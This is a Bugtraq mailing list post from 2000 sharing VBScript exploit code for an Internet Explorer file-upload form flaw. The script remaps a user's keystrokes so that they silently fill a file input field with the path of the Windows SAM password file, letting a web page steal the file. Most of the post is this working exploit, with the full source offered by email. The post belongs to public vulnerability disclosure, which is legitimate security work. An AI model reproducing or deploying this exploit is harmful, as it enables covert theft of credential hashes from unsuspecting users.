Bugtraq mailing list archives
Exploit Code for File Input field advisory.
From: Billy Nothern <disk_key () HOTMAIL COM>
Date: Thu, 7 Dec 2000 21:03:50 -0000
I have coded an exploit example for the "File Upload via Form" vulnerability recently mentioned by Microsoft Security. Here's the source for it (well, most of the source). If you would like the whole source, email me. I'll send it as an attachment. --------------snip------------------ !script language="VBScript"> 'A lot of this isn't pretty, I don't have much time for this kind of stuff. 'Make changes as you wish, but be sure to include me (key) in your version. 'Declare stuff Dim userKey Dim charCount Dim getFile Dim myArray '67|58|47|87|73|78|78|84|47|82|69|80|65|73|82|47|83|65|77|46|95 'c : \ w i n n t \ r e p a i r \ s a m . _ 'Has to be backwards, that's the order I push it into the File field. '95|46|77|65|83|47|82|73|65|80|69|82|47|84|78|78|73|87|47|58|67 '_ . m a s \ r i a p e r \ t n n i w \ : c 'Set getFile with the correct keycodes getFile = "95|46|77|65|83|47|82|73|65|80|69|82|47|84|78|78|73|87|47|58|67" 'ReDim myArray to correct UBound ReDim myArray(Len(getFile)/3) 'Index of array to use charCount = 0 'Set myArray with a split version of getfile myArray = split(getFile, "|") 'This is activated anytime form1.file gains the focus Sub myFocus() document.form1.userInput.focus End Sub 'This is activated with the onKeyPress event of userInput Sub myFuncFirst() If charCount < (Len(getFile)/3) Then 'Find the key the user pressed userKey = chr(window.event.keyCode) 'Change that key to the keycode we want window.event.keyCode = cint(myArray(charCount)) 'Set focus to form1.file so that our key gets sent to it document.form1.file.focus 'Make userInput reflect the user's change document.form1.userInput.value = document.form1.userInput.value + userKey 'Increment charCount to the next char we want charCount = charCount + 1 end if End Sub !/script> ----------snip--------- There are some issues to work out, but I believe this is a pretty good example. Hey, it works doesn't it? Mail me (disk_key<AT>hotmail.com) if you have questions/comments. I have tested on IE 5.0 and IE 5.5. Goodbye, key _____________________________________________________________________________________ Get more from the Web. FREE MSN Explorer download : http://explorer.msn.com
Current thread:
- Exploit Code for File Input field advisory. Billy Nothern (Dec 08)